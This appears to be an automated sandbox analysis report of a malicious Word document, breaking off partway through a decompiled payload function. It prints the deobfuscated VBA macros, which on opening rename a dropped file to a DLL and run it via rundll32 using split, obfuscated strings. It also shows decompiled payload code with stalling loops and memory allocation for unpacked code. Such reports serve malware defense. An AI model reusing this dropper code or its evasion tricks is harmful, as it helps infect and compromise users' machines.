                                          • q2
                                          • hhhhh (Left:2, Run:1, Dir:1)
                                          • hi (Run:1)
                                          • q3
                                          • checkthe (Run:1, Dir:2)
                                          • nyd
                                          • rnee
                                          • cvbc (MoveRight:2)
                                          • bcvxzc (MoveRight:2)
                                          • q4
                                          • q5
                                          • nm
                                          • Document_Open
                                          • stetptwwo (Run:1)
                                          • chek (Dir:1)
                                          • ks (Left:1, Right:1)
                                          • ksa (Left:1)
                                          • iep
                                          • xzczxc
                                          • vvvvvvvx
                                          • q1

                                          Call graph edges (caller -> callee):
                                          • Document_Open -> stetptwwo
                                          • stetptwwo -> hhhhh, chek, ks, ksa, iep
                                          • hhhhh -> cvbc
                                          • cvbc -> bcvxzc
                                          • nyd -> rnee
                                          • ks -> xzczxc
                                          • ksa -> vvvvvvvx
                                          • iep -> q2, q3, q4, q5, q1

                                          Module: Module1

                                          Declaration
                                          Line | Content
                                          1 | Attribute VB_Name = "Module1"
                                          3 | Dim Folders() as String
                                          4 | Dim pit as String

                                          Executed Functions
                                          APIs | Meta Information
                                          Dir
                                          CreateObject
                                          GetFolder
                                          SubFolders
                                          Name
                                          Dir
                                          Dir
                                          Run
                                          Dir
                                          Run | Microsoft Word:Application.Run("hi","c:\users\albus\appdata\Local\Temp")
                                          Strings | Decrypted Strings
                                          "Scripting.FileSystemObject"
                                          "\furmt.f"
                                          """"
                                          "hi"
                                          """"
                                          "hi"
                                          """"
                                          """"
                                          "hi"
                                          "hi"
                                          """"
                                          "hi"
                                          "hi"
                                          Line | Instruction | Meta Information
                                          5 | Sub Getme(RootPath as String)
                                          6 | Dim pafh as String | executed
                                          7 | pafh = pit
                                          8 | hor = pafh
                                          9 | Dim polo as String
                                          10 | polo = "Scripting.FileSystemObject"
                                          11 | Dim uuj as String
                                          12 | uuj = "\furmt.f"
                                          13 | strFileExists = Dir(RootPath & uuj) | Dir
                                          14 | If strFileExists = "" Then
                                          16 | Dim Folder as String
                                          17 | Folder = RootPath
                                          18 | Dim N as Integer
                                          19 | Dim fs, f, f1, fc
                                          21 | Set fs = CreateObject(polo) | CreateObject
                                          22 | Set f = fs.GetFolder(Folder) | GetFolder
                                          23 | Set fc = f.SubFolders | SubFolders
                                          25 | N = 0
                                          26 | On Local Error Resume Next
                                          27 | For Each f1 in fc
                                          28 | N = N + 1
                                          29 | Redim Preserve Folders(1 To N)
                                          30 | Folders(N) = Folder & "\" & f1.Name | Name
                                          31 | If Dir(Folders(N) & "\" & uuj) = "" Then | Dir
                                          32 | Else
                                          33 | Dim kurlbik as String
                                          34 | kurlbik = hor
                                          35 | If Dir(kurlbik & "\ferus.d" & "l" & "l") = "" Then | Dir
                                          37 | kkl = Application.Run("hi", Folders(N)) | Run
                                          39 | Else
                                          40 | Exit Sub
                                          41 | Endif
                                          42 | Endif
                                          44 | Next f1
                                          46 | Else
                                          47 | Dim nvbv as String
                                          48 | nvbv = hor
                                          49 | If Dir(nvbv & "\ferus.d" & "l" & "l") = "" Then | Dir
                                          51 | kkl = Application.Run("hi", RootPath) | Microsoft Word:Application.Run("hi","c:\users\albus\appdata\Local\Temp"); executed
                                          53 | Else
                                          54 | Exit Sub
                                          55 | Endif
                                          56 | Endif
                                          59 | End Sub

                                          Line | Instruction | Meta Information
                                          63 | Sub q2(dl as String)
                                          64 | pit = dl | executed
                                          65 | End Sub

                                          Module: Module2

                                          Declaration
                                          Line | Content
                                          1 | Attribute VB_Name = "Module2"
                                          2 | Dim pit as String

                                          Executed Functions
                                          APIs | Meta Information
                                          Part of subcall function cvbc@Module3: MoveDown
                                          Part of subcall function cvbc@Module3: wdLine
                                          Part of subcall function cvbc@Module3: MoveRight
                                          Part of subcall function cvbc@Module3: wdCharacter
                                          Part of subcall function cvbc@Module3: MoveDown
                                          Part of subcall function cvbc@Module3: wdLine
                                          Part of subcall function cvbc@Module3: MoveRight
                                          Part of subcall function cvbc@Module3: wdCharacter
                                          Part of subcall function cvbc@Module3: MoveDown
                                          Part of subcall function cvbc@Module3: wdLine
                                          Dir
                                          Left
                                          vbDirectory
                                          Run | Microsoft Word:Application.Run("Getme","c:\users\albus\appdata\Local\Temp")
                                          Left
                                          TypeBackspace

                                          Strings | Decrypted Strings
                                          "al""\Te"
                                          "L""o""c"
                                          """"
                                          """"
                                          "Getme"
                                          Line | Instruction | Meta Information
                                          4 | Sub hhhhh()
                                          5 | Dim sda | executed
                                          6 | Dim posl as String
                                          7 | Dim pafh as String
                                          8 | Dim ntgs as Integer
                                          10 | pafh = pit
                                          11 | posl = pafh
                                          13 | Dim bcs as String
                                          14 | bcs = "al" & "\Te"
                                          17 | Dim yer as String
                                          18 | yer = "L" & "o" & "c" & bcs & "mp"
                                          23 | Call cvbc()
                                          24 | ntgs = 50
                                          25 | sda = 49
                                          26 | Dim jos as String
                                          28 | jos = posl
                                          30 | While sda < 50
                                          31 | ntgs = ntgs - 1
                                          33 | If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then | Dir, Left, vbDirectory
                                          35 | Else
                                          37 | sda = 61
                                          38 | Endif
                                          40 | Wend
                                          41 | Dim klas as String
                                          42 | klas = posl

                                          43

                                          Dim bcsa as String

                                          44

                                          bcsa = Application.Run("Getme", Left(klas, ntgs) & yer)

                                          Microsoft Word:Application.Run("Getme","c:\users\albus\appdata\Local\Temp")

                                          Left

                                          executed
                                          45

                                          Selection.TypeBackspace

                                          TypeBackspace

                                          48

                                          End Sub

                                          APIs | Meta Information

                                          Run

                                          Microsoft Word:Application.Run("nyd","c:\users\albus\appdata\Local\Temp","c:\users\albus\appdata\roaming\microsoft\word\ferus.dll")
                                          Strings | Decrypted Strings
                                          "nyd"
                                          Line | Instruction | Meta Information
                                          55

                                          Sub hi(myhome as String)

                                          56

                                          Dim plop as String

                                          executed
                                          57

                                          Dim pafh as String

                                          58

                                          pafh = pit

                                          59

                                          plop = pafh

                                          60

                                          Dim kkx as String

                                          61

                                          kkx = Application.Run("nyd", myhome, plop & "\ferus.d" & "l" & "l")

                                          Microsoft Word:Application.Run("nyd","c:\users\albus\appdata\Local\Temp","c:\users\albus\appdata\roaming\microsoft\word\ferus.dll")

                                          executed
                                          62

                                          End Sub

                                          Line | Instruction | Meta Information
                                          67

                                          Sub q3(dl as String)

                                          68

                                          pit = dl

                                          executed
                                          69

                                          End Sub

                                          Module: Module3

                                          Declaration
                                          Line | Content
                                          1

                                          Attribute VB_Name = "Module3"

                                          3

                                          Dim pit as String

                                          Executed Functions
                                          APIs | Meta Information

                                          MoveDown

                                          wdLine

                                          MoveRight

                                          wdCharacter

                                          MoveDown

                                          wdLine

                                          MoveRight

                                          wdCharacter

                                          MoveDown

                                          wdLine

                                          Part of subcall function bcvxzc@Module3: MoveRight

                                          Part of subcall function bcvxzc@Module3: wdCharacter

                                          Part of subcall function bcvxzc@Module3: MoveDown

                                          Part of subcall function bcvxzc@Module3: wdLine

                                          Part of subcall function bcvxzc@Module3: MoveRight

                                          Part of subcall function bcvxzc@Module3: wdCharacter

                                          Part of subcall function bcvxzc@Module3: TypeBackspace

                                          Part of subcall function bcvxzc@Module3: Copy

                                          Line | Instruction | Meta Information
                                          69

                                          Sub cvbc()

                                          70

                                          Selection.MoveDown Unit := wdLine, Count := 1

                                          MoveDown

                                          wdLine

                                          executed
                                          71

                                          Selection.MoveRight Unit := wdCharacter, Count := 5

                                          MoveRight

                                          wdCharacter

                                          72

                                          Selection.MoveDown Unit := wdLine, Count := 23

                                          MoveDown

                                          wdLine

                                          73

                                          Selection.MoveRight Unit := wdCharacter, Count := 51

                                          MoveRight

                                          wdCharacter

                                          74

                                          Selection.MoveDown Unit := wdLine, Count := 23

                                          MoveDown

                                          wdLine

                                          75

                                          Call bcvxzc()

                                          76

                                          End Sub

                                          APIs | Meta Information

                                          MoveRight

                                          wdCharacter

                                          MoveDown

                                          wdLine

                                          MoveRight

                                          wdCharacter

                                          TypeBackspace

                                          Copy

                                          Line | Instruction | Meta Information
                                          57

                                          Sub bcvxzc()

                                          58

                                          Selection.MoveRight Unit := wdCharacter, Count := 5

                                          MoveRight

                                          wdCharacter

                                          executed
                                          59

                                          Selection.MoveDown Unit := wdLine, Count := 23

                                          MoveDown

                                          wdLine

                                          60

                                          Selection.MoveRight Unit := wdCharacter, Count := 51

                                          MoveRight

                                          wdCharacter

                                          61

                                          Selection.TypeBackspace

                                          TypeBackspace

                                          62

                                          Selection.Copy

                                          Copy

                                          64

                                          End Sub

                                          Line | Instruction | Meta Information
                                          43

                                          Sub nyd(uuu as String, aaaa as String)

                                          45

                                          Call rnee(uuu, aaaa)

                                          executed
                                          46

                                          End Sub

                                          Line | Instruction | Meta Information
                                          50

                                          Sub rnee(myhome as String, hsa as String)

                                          52

                                          Name myhome & "\furmt.f" As hsa

                                          executed
                                          53

                                          End Sub

                                          Line | Instruction | Meta Information
                                          80

                                          Sub q4(dl as String)

                                          81

                                          pit = dl

                                          executed
                                          82

                                          End Sub

                                          Non-Executed Functions
                                          APIs | Meta Information

                                          Dir

                                          Dir

                                          Run

                                          Strings | Decrypted Strings
                                          """"
                                          """"
                                          "nm"
                                          "nm"
                                          Line | Instruction | Meta Information
                                          16

                                          Sub checkthe(sf as String)

                                          18

                                          Dim pafh as String

                                          19

                                          pafh = pit

                                          20

                                          Dim lassap as String

                                          23

                                          Dim ololow as String

                                          24

                                          ololow = sf

                                          25

                                          Dim nothings as String

                                          26

                                          nothings = 2

                                          28

                                          If Dir(sf & "\furmt.f") = "" Then

                                          Dir

                                          30

                                          Else

                                          31

                                          If Dir(nothings) = "" Then

                                          Dir

                                          33

                                          lassap = Application.Run("nm", ololow)

                                          Run

                                          34

                                          Else

                                          35

                                          Exit Sub

                                          36

                                          Endif

                                          38

                                          Endif

                                          39

                                          End Sub

                                          Module: Module4

                                          Declaration
                                          Line | Content
                                          1

                                          Attribute VB_Name = "Module4"

                                          2

                                          Dim pit as String

                                          Executed Functions
                                          Line | Instruction | Meta Information
                                          5

                                          Sub q5(dl as String)

                                          6

                                          pit = dl

                                          executed
                                          7

                                          End Sub

                                          Non-Executed Functions
                                          Line | Instruction | Meta Information
                                          9

                                          Sub nm(ololow as String)

                                          10

                                          Name ololow & "\furmt.f" As pit & "\" & "ferus.d" & "l" & "l"

                                          11

                                          End Sub

                                          Module: Module5

                                          Declaration
                                          Line | Content
                                          1

                                          Attribute VB_Name = "Module5"

                                          Module: Module6

                                          Declaration
                                          Line | Content
                                          1

                                          Attribute VB_Name = "Module6"

                                          Module: ThisDocument

                                          Declaration
                                          Line | Content
                                          1

                                          Attribute VB_Name = "ThisDocument"

                                          2

                                          Attribute VB_Base = "1Normal.ThisDocument"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = True

                                          8

                                          Attribute VB_Customizable = True

                                          10

                                          Dim ji as Integer

                                          11

                                          Dim pit as String

                                          12

                                          Dim r1, r2 as String

                                          13

                                          Dim w1, w2 as String

                                          Executed Functions
                                          APIs | Meta Information

                                          Part of subcall function iep@ThisDocument: DefaultFilePath

                                          Part of subcall function iep@ThisDocument: wdAutoRecoverPath

                                          Part of subcall function chek@ThisDocument: Dir

                                          Part of subcall function hhhhh@Module2: Dir

                                          Part of subcall function hhhhh@Module2: Left

                                          Part of subcall function hhhhh@Module2: vbDirectory

                                          Part of subcall function hhhhh@Module2: Run

                                          Part of subcall function hhhhh@Module2: Left

                                          Part of subcall function hhhhh@Module2: TypeBackspace

                                          Part of subcall function ks@ThisDocument: Left

                                          Part of subcall function ks@ThisDocument: Right

                                          Part of subcall function ksa@ThisDocument: Left

                                          nmbvd

                                          CreateObject

                                          CreateObject("WScript.Shell")

                                          Run

                                          IWshShell3.Run("rundll32.exe c:\users\albus\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS") -> 0
                                          Strings | Decrypted Strings
                                          "\ferus.d"
                                          "n"
                                          "3"
                                          "r"
                                          "l"
                                          "WScript.Shell"
                                          Line | Instruction | Meta Information
                                          20

                                          Sub stetptwwo()

                                          21

                                          ji = 0

                                          executed
                                          22

                                          Call iep()

                                          23

                                          Dim rx as String

                                          24

                                          Dim oys as String

                                          26

                                          Dim bcvxz as String

                                          27

                                          rx = "\ferus.d"

                                          28

                                          Dim mbnd as Integer

                                          29

                                          Dim kjhnbs as Integer

                                          30

                                          Call chek()

                                          31

                                          kjhnbs = ji

                                          33

                                          Dim jkjhb as String

                                          34

                                          If kjhnbs = 1 Then

                                          35

                                          Else

                                          36

                                          Dim jkjhbf as String

                                          39

                                          Call hhhhh()

                                          40

                                          Dim wrefs as String

                                          41

                                          wrefs = pit

                                          42

                                          bcvxz = wrefs

                                          43

                                          Dim bfdsdadad as String

                                          44

                                          Dim erfvbcz as String

                                          46

                                          bfdsdadad = "n"

                                          48

                                          Call ks()

                                          49

                                          Call ksa()

                                          51

                                          Dim bcbv as String

                                          52

                                          bcbv = nmbvd

                                          nmbvd

                                          53

                                          Dim hgfcvxv as String

                                          55

                                          Dim oloow as String

                                          56

                                          oloow = r2

                                          57

                                          werfsxv = "3" & 2 & oloow

                                          58

                                          Dim hfgv as String

                                          59

                                          hfgv = bfdsdadad & "d"

                                          62

                                          Dim htyhbv as String

                                          63

                                          htyhbv = werfsxv

                                          64

                                          Dim hgvmbm as String

                                          65

                                          hgvmbm = "r"

                                          67

                                          Dim luyhgdffs as String

                                          68

                                          luyhgdffs = "l"

                                          69

                                          Dim bcvsdsf as String

                                          70

                                          bcvsdsf = hgvmbm & "u" & hfgv & "l" & luyhgdffs & htyhbv

                                          73

                                          hgfcvxv = r1

                                          74

                                          oys = bcvxz & rx & hgfcvxv & hgfcvxv & ",YYUNXEGQRYS"

                                          77

                                          Dim xcvxv as Object

                                          78

                                          Set xcvxv = VBA.CreateObject("WScript.Shell")

                                          CreateObject("WScript.Shell")

                                          executed
                                          80

                                          xcvxv.Run bcvsdsf & " " & oys

                                          IWshShell3.Run("rundll32.exe c:\users\albus\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS") -> 0

                                          executed
                                          82

                                          Endif

                                          83

                                          End Sub

                                          APIs | Meta Information

                                          Part of subcall function stetptwwo@ThisDocument: nmbvd

                                          Part of subcall function stetptwwo@ThisDocument: CreateObject

                                          Part of subcall function stetptwwo@ThisDocument: Run

                                          Line | Instruction | Meta Information
                                          14

                                          Private Sub Document_Open()

                                          15

                                          Call stetptwwo()

                                          executed
                                          16

                                          End Sub

                                          APIs | Meta Information

                                          Part of subcall function xzczxc@ThisDocument: Cell

                                          Left

                                          Right

                                          Line | Instruction | Meta Information
                                          121

                                          Sub ks()

                                          122

                                          Dim askl as String

                                          executed
                                          123

                                          Call xzczxc()

                                          124

                                          askl = w1

                                          125

                                          r1 = Left(askl, 3)

                                          Left

                                          127

                                          r1 = Right(r1, 1)

                                          Right

                                          129

                                          End Sub

                                          APIs | Meta Information

                                          Dir

                                          Strings | Decrypted Strings
                                          """"
                                          Line | Instruction | Meta Information
                                          90

                                          Sub chek()

                                          92

                                          Dim jos as String

                                          executed
                                          93

                                          Dim pafh as String

                                          94

                                          pafh = pit

                                          95

                                          jos = pafh

                                          98

                                          If Dir(jos & "\ferus.d" & "l" & "l") = "" Then

                                          Dir

                                          99

                                          ji = 0

                                          100

                                          Else

                                          102

                                          ji = 1

                                          103

                                          Endif

                                          104

                                          End Sub

                                          APIs | Meta Information

                                          DefaultFilePath

                                          wdAutoRecoverPath

                                          Line | Instruction | Meta Information
                                          140

                                          Sub iep()

                                          141

                                          Dim kf as String

                                          executed
                                          142

                                          kf = Options.DefaultFilePath(wdAutoRecoverPath)

                                          DefaultFilePath

                                          wdAutoRecoverPath

                                          143

                                          Call q1(kf)

                                          144

                                          Call q2(kf)

                                          145

                                          Call q3(kf)

                                          146

                                          Call q4(kf)

                                          147

                                          Call q5(kf)

                                          148

                                          End Sub

                                          APIs | Meta Information

                                          Part of subcall function vvvvvvvx@ThisDocument: Cell

                                          Left

                                          Line | Instruction | Meta Information
                                          131

                                          Sub ksa()

                                          132

                                          Dim askl as String

                                          executed
                                          133

                                          Call vvvvvvvx()

                                          134

                                          askl = w2

                                          135

                                          r2 = Left(askl, 4)

                                          Left

                                          136

                                          End Sub

                                          APIs | Meta Information

                                          Cell

                                          Line | Instruction | Meta Information
                                          108

                                          Sub xzczxc()

                                          109

                                          w1 = ThisDocument.Tables(1).Cell(1, 1).Range.Text

                                          Cell

                                          executed
                                          110

                                          End Sub

                                          APIs | Meta Information

                                          Cell

                                          Line | Instruction | Meta Information
                                          115

                                          Sub vvvvvvvx()

                                          116

                                          w2 = ThisDocument.Tables(1).Cell(1, 2).Range.Text

                                          Cell

                                          executed
                                          117

                                          End Sub

                                          Line | Instruction | Meta Information
                                          137

                                          Sub q1(dl as String)

                                          138

                                          pit = dl

                                          executed
                                          139

                                          End Sub


                                            Execution Graph

                                            Execution Coverage:8.6%
                                            Dynamic/Decrypted Code Coverage:51.1%
                                            Signature Coverage:23.6%
                                            Total number of Nodes:622
                                            Total number of Limit Nodes:9

                                            Graph


                                            Executed Functions

                                            Control-flow Graph

                                            C-Code - Quality: 96%
                                            			E00192358(intOrPtr __eax, void* __eflags) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				long _v52;
                                            				intOrPtr _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr _v72;
                                            				intOrPtr _v76;
                                            				intOrPtr _v80;
                                            				intOrPtr _v84;
                                            				intOrPtr _v88;
                                            				intOrPtr _v92;
                                            				intOrPtr _v96;
                                            				long _t82;
                                            				CHAR* _t84;
                                            				CHAR* _t86;
                                            				CHAR* _t87;
                                            				intOrPtr _t90;
                                            				intOrPtr* _t95;
                                            				intOrPtr _t99;
                                            				intOrPtr _t101;
                                            				intOrPtr* _t103;
                                            				intOrPtr _t105;
                                            				void* _t113;
                                            				signed int* _t116;
                                            				signed int* _t117;
                                            				signed int* _t124;
                                            				intOrPtr _t127;
                                            				struct HICON__* _t128;
                                            				signed int* _t129;
                                            				int _t132;
                                            				int _t133;
                                            				signed int* _t134;
                                            				struct HICON__* _t239;
                                            				signed int* _t240;
                                            				struct HICON__* _t243;
                                            				struct HICON__* _t244;
                                            				struct HICON__* _t245;
                                            				struct HICON__* _t246;
                                            				struct HICON__* _t247;
                                            				struct HICON__* _t248;
                                            				struct HICON__* _t249;
                                            				struct HICON__* _t250;
                                            				struct HICON__* _t251;
                                            				struct HICON__* _t252;
                                            				struct HICON__* _t253;
                                            				struct HICON__* _t254;
                                            				struct HICON__* _t255;
                                            				struct HICON__* _t256;
                                            				struct HICON__* _t257;
                                            				struct HICON__* _t258;
                                            				struct HICON__* _t259;
                                            				struct HICON__* _t260;
                                            				struct HICON__* _t261;
                                            				struct HICON__* _t262;
                                            				struct HICON__* _t263;
                                            				struct HICON__* _t264;
                                            				struct HICON__* _t265;
                                            				struct HICON__* _t266;
                                            				struct HICON__* _t267;
                                            				struct HICON__* _t268;
                                            				struct HICON__* _t269;
                                            				struct HICON__* _t270;
                                            				struct HICON__* _t271;
                                            				struct HICON__* _t272;
                                            				struct HICON__* _t273;
                                            				signed int* _t274;
                                            				signed int* _t309;
                                            				CHAR* _t315;
                                            				CHAR* _t316;
                                            				intOrPtr _t356;
                                            				intOrPtr _t362;
                                            				intOrPtr _t367;
                                            				intOrPtr _t370;
                                            				intOrPtr _t372;
                                            				intOrPtr _t373;
                                            
                                            				_t370 = _t372;
                                            				_t373 = _t372 + 0xffffffa4;
                                            				_v96 = __eax;
                                            				_v88 = 0x64c;
                                            				_v72 = 0x5f2;
                                            				_v76 = 0x980;
                                            				_v80 = 0x10f6;
                                            				_v84 = 0x1484;
                                            				_v92 = 0x1bf0;
                                            				_v32 = 0x83f0;
                                            				_v36 = 0x1000;
                                            				_v40 = 2;
                                            				_v44 = 0x7b;
                                            				_v48 = 0;
                                            				 *0x194890 = 0xfa;
                                            				_t82 =  *0x194890; // 0x6
                                            				 *0x19488c = E00182628(_t82);
                                            				_t84 =  *0x19488c; // 0x1fd0a4c
                                            				GetUserNameA(_t84, 0x194890);
                                            				_t86 =  *0x19488c; // 0x1fd0a4c
                                            				if(_t86[1] != 0x6f) {
                                            					L3:
                                            					_v76 = 1;
                                            					do {
                                            						_t87 =  *0x19488c; // 0x1fd0a4c
                                            						GetUserNameA(_t87, 0x194890);
                                            						_v76 = _v76 + 1;
                                            					} while (_v76 != 0x1c364);
                                            					_t356 =  *0x194660; // 0x180000
                                            					_t90 = E001916D8(_t356, 1, 0x930, "rrrrr"); // executed
                                            					 *0x19487c = _t90;
                                            					_v8 = _t373;
                                            					_v8 = _v8 + 0xa8;
                                            					_v12 = _t370;
                                            					_v12 = _v12 + 0x64;
                                            					_v16 =  *0x00194650;
                                            					_v20 =  *0x0019464C;
                                            					_v72 = 0x5f14c3;
                                            					do {
                                            						GetEnhMetaFileA(E00192D44); // executed
                                            						GetEnhMetaFileA(E00192D44);
                                            						_v72 = _v72 - 1;
                                            					} while (_v72 != 0);
                                            					_t95 =  *0x19487c; // 0x1fd0b4c
                                            					_v52 =  *((intOrPtr*)( *_t95))();
                                            					 *0x194880 = E00182628(_v52);
                                            					_t362 =  *0x194880; // 0x1fd0b6c
                                            					_t99 =  *0x19487c; // 0x1fd0b4c
                                            					E00191374(_t99, _v52, _t362);
                                            					_t101 =  *0x19487c; // 0x1fd0b4c
                                            					E00182E44(_t101);
                                            					_t103 =  *0x194880; // 0x1fd0b6c
                                            					_v28 =  *_t103;
                                            					_t105 =  *0x194880; // 0x1fd0b6c
                                            					 *0x194880 = _t105 + 4;
                                            					_v64 = 0x106f;
                                            					_v68 = 0xaf;
                                            					 *0x194894 = 0x1857b8;
                                            					_t113 = VirtualAllocEx(0xffffffff, 0, _v52, _v64 - 0x6f, _v68 - 0x6f); // executed
                                            					 *0x194888 = _t113;
                                            					E00185828();
                                            					_t116 =  *0x194888; // 0xc7800
                                            					 *0x194884 = _t116;
                                            					_t117 =  *0x194884; // 0xbfffc
                                            					 *0x194884 = _t117 - 4;
                                            					_v56 = 0;
                                            					_v60 = 0;
                                            					while(_v56 < _v52) {
                                            						_t367 =  *0x194880; // 0x1fd0b6c
                                            						_t309 =  *0x194888; // 0xc7800
                                            						E00185820(_t309 + _v60, _t367 + _v56);
                                            						_v60 = _v60 + _v44;
                                            						_v56 = _v56 + _v44;
                                            						_v56 = _v56 + _v48;
                                            					}
                                            					_v84 = 0x8a58a;
                                            					_v72 = 0;
                                            					while(_v72 < _v28) {
                                            						_t128 = LoadCursorA(0, 0x108c);
                                            						_t129 =  *0x194888; // 0xc7800
                                            						_t132 = DeleteObject(0);
                                            						_t133 = DeleteObject(0);
                                            						_t134 =  *0x194888; // 0xc7800
                                            						 *_t134 = _t128 +  *_t129 + _v72 + _t132 - _t133;
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						_t239 = LoadCursorA(0, 0x108c);
                                            						_t240 =  *0x194888; // 0xc7800
                                            						_t243 = LoadCursorA(0, 0x108c);
                                            						_t244 = LoadCursorA(0, 0x108c);
                                            						_t245 = LoadCursorA(0, 0x108c);
                                            						_t246 = LoadCursorA(0, 0x108c);
                                            						_t247 = LoadCursorA(0, 0x108c);
                                            						_t248 = LoadCursorA(0, 0x108c);
                                            						_t249 = LoadCursorA(0, 0x108c);
                                            						_t250 = LoadCursorA(0, 0x108c);
                                            						_t251 = LoadCursorA(0, 0x108c);
                                            						_t252 = LoadCursorA(0, 0x108c);
                                            						_t253 = LoadCursorA(0, 0x108c);
                                            						_t254 = LoadCursorA(0, 0x108c);
                                            						_t255 = LoadCursorA(0, 0x108c);
                                            						_t256 = LoadCursorA(0, 0x108c);
                                            						_t257 = LoadCursorA(0, 0x108c);
                                            						_t258 = LoadCursorA(0, 0x108c);
                                            						_t259 = LoadCursorA(0, 0x108c);
                                            						_t260 = LoadCursorA(0, 0x108c);
                                            						_t261 = LoadCursorA(0, 0x108c);
                                            						_t262 = LoadCursorA(0, 0x108c);
                                            						_t263 = LoadCursorA(0, 0x108c);
                                            						_t264 = LoadCursorA(0, 0x108c);
                                            						_t265 = LoadCursorA(0, 0x108c);
                                            						_t266 = LoadCursorA(0, 0x108c);
                                            						_t267 = LoadCursorA(0, 0x108c);
                                            						_t268 = LoadCursorA(0, 0x108c);
                                            						_t269 = LoadCursorA(0, 0x108c);
                                            						_t270 = LoadCursorA(0, 0x108c);
                                            						_t271 = LoadCursorA(0, 0x108c);
                                            						_t272 = LoadCursorA(0, 0x108c);
                                            						_t273 = LoadCursorA(0, 0x108c);
                                            						_t274 =  *0x194888; // 0xc7800
                                            						 *_t274 = _t239 + ( *_t240 ^ _v40 + _v84 + _v72) + _t243 + _t244 + _t245 + _t246 + _t247 + _t248 + _t249 + _t250 + _t251 + _t252 + _t253 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t260 + _t261 + _t262 + _t263 + _t264 + _t265 + _t266 + _t267 + _t268 + _t269 + _t270 + _t271 + _t272 + _t273;
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
